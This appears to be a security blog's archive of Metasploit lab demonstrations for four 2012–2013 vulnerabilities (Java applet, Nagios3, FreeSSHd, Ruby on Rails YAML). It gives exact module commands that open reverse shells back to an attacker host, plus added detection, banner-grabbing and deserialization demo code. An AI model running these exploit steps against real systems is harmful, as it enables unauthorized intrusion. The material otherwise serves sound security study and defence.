Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo

Timeline :

Vulnerability patched by Oracle in the October 2012 CPU
Vulnerability discovered being exploited in the wild by kafeine on 2012-11-09
First Metasploit PoC provided on 2012-11-11
Second Metasploit PoC provided on 2013-01-22

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Cool EK : “Hello my friend…”
Oracle October 2012 CPU
New Java Modules in Metasploit… No 0 days this time

Affected version(s) :

Oracle Java version 7 Update 7 and earlier.

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java 7 Update 7

Description :

This module abuses the AverageRangeStatisticImpl class from a Java applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one exploited in the wild in November 2012. The vulnerability affects Java 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-6096 Nagios3 history.cgi Vulnerability Metasploit Demo

Timeline :

Vulnerability reported on Full Disclosure by Aris (temp66) on 2012-12-09
PoC provided by blasty on 2013-01-10
Metasploit PoC provided on 2013-01-15

PoC provided by :

Unknown (temp66)
blasty
Jose Selvi
Daniele Martini

Reference(s) :

CVE-2012-6096
OSVDB-88322
BID-56879
Full Disclosure

Affected version(s) :

Nagios 3.4.3 and earlier

Tested on Debian 5.0.10 with :

nagios3_3.0.6-4~lenny2_i386.deb

Description :

This module exploits a stack-based buffer overflow in the Nagios3 history.cgi script (CVE-2012-6096): an over-long host name value overflows a fixed-size buffer in the CGI and gives code execution as the web server user. At least one alert must already exist in the history.cgi page for the exploit to work.

Commands :

use exploit/unix/webapp/nagios3_history_cgi
set RHOST 192.168.178.44
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo
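On the defensive side, the overflow above has to travel through the web server as one history.cgi request with an abnormally long parameter value, which makes it easy to spot in access logs. The detector below is an added example, not code from the original post, from Nagios or from Metasploit; the Apache log lines and the 255-byte threshold are constructed assumptions for the demo.

```ruby
# Added example (not code from the original post or from Nagios/Metasploit):
# a detector for history.cgi requests carrying an oversized parameter value,
# run here over constructed Apache access-log lines.

# Heuristic threshold. Anything above this is far longer than a real host
# name; the value is an assumption, not a figure from the Nagios source.
MAX_PARAM_LEN = 255

# Constructed log lines: normal use, an overflow-sized host value, and an
# unrelated CGI. No real payload is reproduced, only its length.
SAMPLE_LOG = [
  '192.168.178.26 - - [15/Jan/2013:21:03:11 +0100] "GET /cgi-bin/nagios3/history.cgi?host=all HTTP/1.1" 200 5321 "-" "Mozilla/5.0"',
  '192.168.178.26 - - [15/Jan/2013:21:03:12 +0100] "GET /cgi-bin/nagios3/history.cgi?host=' + ('A' * 1500) + ' HTTP/1.1" 200 12 "-" "-"',
  '192.168.178.30 - - [15/Jan/2013:21:04:00 +0100] "GET /cgi-bin/nagios3/status.cgi?host=all HTTP/1.1" 200 9000 "-" "Mozilla/5.0"'
].freeze

# Apache combined log format: client, identity, user, [timestamp], "request", status ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<target>\S+) [^"]*" (?<status>\d{3})/

# Split "?k=v&k2=v2" without decoding: a malformed %-escape is exactly what
# an exploit might contain, and decoding can only shorten a value.
def raw_query_params(target)
  _path, query = target.split('?', 2)
  return [] unless query
  query.split('&').map { |kv| k, v = kv.split('=', 2); [k, v.to_s] }
end

# One hash per suspicious line: source, time, HTTP status and the
# offending parameter names with their raw lengths.
def suspicious_history_requests(lines, max_len = MAX_PARAM_LEN)
  lines.each_with_object([]) do |line, hits|
    m = LOG_RE.match(line)
    next unless m
    path = m[:target].split('?', 2).first
    next unless path.end_with?('/history.cgi')
    long = raw_query_params(m[:target]).select { |_, v| v.length > max_len }
    next if long.empty?
    hits << { ip: m[:ip], time: m[:ts], status: m[:status].to_i,
              params: long.map { |k, v| [k, v.length] }.to_h }
  end
end

if __FILE__ == $0
  suspicious_history_requests(SAMPLE_LOG).each { |h| puts h.inspect }
end
```

Matching on the raw, still-encoded length is deliberate: the exploit payload is binary and may not decode cleanly, and decoding never makes a value longer, so the raw length is a safe upper bound for the check.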

CVE-2012-6066 FreeSSHd Authentication Bypass Metasploit Demo

Timeline :

Vulnerability initially discovered by Aris on 2010-08-11
PoC provided by kcope on 2012-12-01
Metasploit PoC provided on 2013-01-13

PoC provided by :

kcope
Aris
Daniele Martini

Reference(s) :

CVE-2012-6066
OSVDB-88006
BID-56785
Full Disclosure 2012
Full Disclosure 2010

Affected version(s) :

FreeSSHd version 1.2.6 and earlier

Tested on Windows XP SP3 with :

FreeSSHd 1.2.4

Description :

This module exploits a vulnerability in FreeSSHd 1.2.6 and earlier to bypass authentication. Only the username is needed (which defaults to root). The exploit has been tested with both password and public key authentication.

Commands :

use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.178.22
run

use exploit/windows/ssh/freesshd_authbypass
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo
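The first command in the procedure, the ssh_version scanner, only reads the server's identification string. The script below is an added example of the same check written by hand, not code from the original post or from Metasploit, so the banner can be inspected and classified before the exploit is run. It assumes FreeSSHd identifies itself through the WeOnlyDo library name it is built on; the exact string and the sample banner are assumptions, not captures from the 1.2.4 host.

```ruby
# Added example (not code from the original post or from Metasploit): a
# hand-rolled equivalent of auxiliary/scanner/ssh/ssh_version, so the server's
# identification string can be read and classified before deciding whether a
# host is a FreeSSHd instance worth testing.
require 'socket'

# RFC 4253 section 4.2: "SSH-protoversion-softwareversion SP comments CR LF".
# Anything before that line may be sent by the server and must be ignored.
IDENT_RE = /\ASSH-(?<proto>[^-]+)-(?<software>\S+)(?: (?<comments>.*))?\z/

# FreeSSHd is built on the WeOnlyDo SSH library, so it identifies itself by
# that library name rather than as "FreeSSHd". The exact string it sends,
# and the sample in the test, are assumptions, not captured from a host.
FREESSHD_MARKER = /WeOnlyDo/i

# Parse raw bytes received so far. Only complete lines (terminated by LF) are
# considered, so a partially received banner yields nil rather than a
# truncated software version.
def parse_ssh_ident(raw)
  raw.each_line do |line|
    next unless line.end_with?("\n")
    m = IDENT_RE.match(line.chomp)
    next unless m
    return { proto: m[:proto], software: m[:software], comments: m[:comments],
             freesshd: FREESSHD_MARKER.match?(m[:software]) }
  end
  nil
end

# Connect, read until an identification line arrives or the read budget is
# spent, and return the parsed banner (nil on timeout, refusal or junk).
def grab_ssh_ident(host, port = 22, timeout = 5)
  Socket.tcp(host, port, connect_timeout: timeout) do |sock|
    buf = +''
    while buf.bytesize < 4096 && IO.select([sock], nil, nil, timeout)
      buf << sock.readpartial(1024)
      ident = parse_ssh_ident(buf)
      return ident if ident
    end
    nil
  end
rescue EOFError, SystemCallError, SocketError
  nil
end

if __FILE__ == $0 && !ARGV.empty?
  ident = grab_ssh_ident(ARGV[0], (ARGV[1] || 22).to_i)
  puts(ident ? ident.inspect : "no SSH identification string from #{ARGV[0]}")
end
```

Usage: `ruby ssh_ident.rb 192.168.178.22 22`. Note that RFC 4253 forbids spaces in softwareversion, so a banner such as "SSH-2.0-WeOnlyDo 2.1.3" parses with the version number in the comments field, which is why the classifier looks at the software name only.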

CVE-2013-0156 Ruby on Rails XML Processor YAML Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by numerous people
Coordinated public release of the vulnerability on 2013-01-08
Metasploit PoC provided on 2013-01-09

PoC provided by :

charliesome
espes
lian
hdm

Reference(s) :

CVE-2013-0156
Exploiting Ruby on Rails with Metasploit (CVE-2013-0156)

Affected version(s) :

All versions of Ruby on Rails (RoR) prior to 3.2.11, 3.1.10, 3.0.19 and 2.3.15

Tested on Centos 6.3 i386 with :

RoR 3.2.10
passenger 3.0.19
GrayLog2 0.9.6

Description :

This module exploits a remote code execution vulnerability in the XML request processor of the Ruby on Rails application framework. Because the XML parser accepts a type="yaml" attribute and hands the element's text to the YAML loader, an attacker can instantiate an arbitrary Ruby object from a request body, which in turn can be used to execute any Ruby code remotely in the context of the application. This module has been tested across multiple versions of RoR 3.x and RoR 2.x. The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated.

Commands :

use auxiliary/scanner/http/rails_xml_yaml_scanner
set RHOSTS 192.168.21.124
set VHOST rails.zataz.loc
run

use exploit/multi/http/rails_xml_yaml_code_exec
set RHOST 192.168.21.124
set VHOST rails.zataz.loc
set PAYLOAD ruby/shell_reverse_tcp
set LHOST 192.168.21.169
exploit

id
uname -a
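To see why an XML body can instantiate objects at all, the script below re-implements, in a few lines, the type-attribute typecasting that ActiveSupport's XmlMini applied to incoming XML in Rails 3.2.10, and then applies the advisory's workaround of deleting the "yaml" and "symbol" converters. It is an added example, not code from the original post, from Rails or from Metasploit; the AuditEvent class and the request body are constructed for the demo and the table is a simplified copy, not the real PARSING hash.

```ruby
# Added example (not code from the original post, from Rails or from
# Metasploit): a minimal re-implementation of how ActiveSupport's XmlMini
# typecasts XML elements that carry a type="..." attribute, to show why an
# XML request body could instantiate arbitrary Ruby objects and what the
# advisory's workaround changes. AuditEvent and the body are constructed.
require 'rexml/document'
require 'yaml'

# Harmless stand-in for whatever class an attacker names. Psych's generic
# !ruby/object revival allocates it and sets instance variables without
# ever calling #initialize, so no constructor check helps.
class AuditEvent
  attr_accessor :message
end

# Psych 4 made YAML.load safe; use the loader that still honours tags so
# the pre-2013 behaviour is reproduced on a current Ruby.
UNSAFE_LOADER = YAML.respond_to?(:unsafe_load) ? YAML.method(:unsafe_load) : YAML.method(:load)

# Simplified copy of ActiveSupport::XmlMini::PARSING: type attribute value
# to converter. "yaml" hands the element text to the full YAML loader.
PARSING = {
  'integer' => ->(s) { s.to_i },
  'boolean' => ->(s) { %w[1 true].include?(s.strip) },
  'symbol'  => ->(s) { s.to_sym },
  'yaml'    => ->(s) { UNSAFE_LOADER.call(s) rescue s }
}.freeze

# The advisory's workaround, applied to our copy of the table:
#   ActiveSupport::XmlMini::PARSING.delete("yaml")
#   ActiveSupport::XmlMini::PARSING.delete("symbol")
SAFE_PARSING = PARSING.reject { |k, _| %w[yaml symbol].include?(k) }.freeze

# Typecast a flat XML document the way Hash.from_xml does: the `type`
# attribute on each child element selects the converter for its text.
def from_xml(body, parsing = PARSING)
  doc = REXML::Document.new(body)
  doc.root.elements.each_with_object({}) do |el, h|
    conv = parsing[el.attributes['type']]
    h[el.name] = conv ? conv.call(el.text.to_s) : el.text
  end
end

# Constructed request body shaped like the CVE-2013-0156 payloads: a
# yaml-typed element whose text carries a !ruby/object tag.
MALICIOUS_XML = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <post>
    <title>hello</title>
    <count type="integer">3</count>
    <extra type="yaml">--- !ruby/object:AuditEvent
  message: instantiated from the request body
  </extra>
  </post>
XML

if __FILE__ == $0
  puts "vulnerable: #{from_xml(MALICIOUS_XML)['extra'].inspect}"
  puts "workaround: #{from_xml(MALICIOUS_XML, SAFE_PARSING)['extra'].inspect}"
end
```

With the full table the "extra" element comes back as a live AuditEvent; with the reduced table it stays a string. The real exploit differs only in the class it names: one whose revived instance ends up evaluating attacker-controlled Ruby when the application touches it, which is what turns object instantiation into the remote code execution the module delivers.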